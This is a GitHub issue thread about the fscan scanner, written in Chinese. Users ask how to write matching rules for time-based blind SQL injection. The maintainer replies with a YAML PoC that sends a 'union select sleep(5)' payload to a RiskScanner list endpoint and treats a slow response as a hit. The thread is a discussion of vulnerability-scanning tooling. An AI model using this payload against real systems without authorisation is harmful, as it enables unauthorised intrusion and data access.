fscan icon indicating copy to clipboard operation
fscan copied to clipboard

请问关于时间盲注的响应匹配规则要怎么写

Open Awrrays opened this issue 1 year ago • 4 comments

Awrrays avatar Aug 23 '24 01:08 Awrrays

同样,跟你遇到一样的困惑了,希望作者能考虑一下

Zer08Bytes avatar Aug 29 '24 09:08 Zer08Bytes

Poc目录里搜索 sleep有例子。

name: riskscanner-list-sqli
rules:
  - method: POST
    path: /resource/list/1/10
    headers:
      Content-Type: application/json;charset=UTF-8
    body: "\
    {\"sort\":\"1)a union select sleep(5) -- -\"}\r\n\
    "
    expression: |
      response.status == 200 &&  response.duration >= 5.0

shadow1ng avatar Aug 29 '24 09:08 shadow1ng

图片 更改了 虽然加载的时候不报错,但是检测不出来(注:测试的poc和目标都没问题)

Zer08Bytes avatar Aug 29 '24 10:08 Zer08Bytes

我回头看看把

shadow1ng avatar Aug 29 '24 10:08 shadow1ng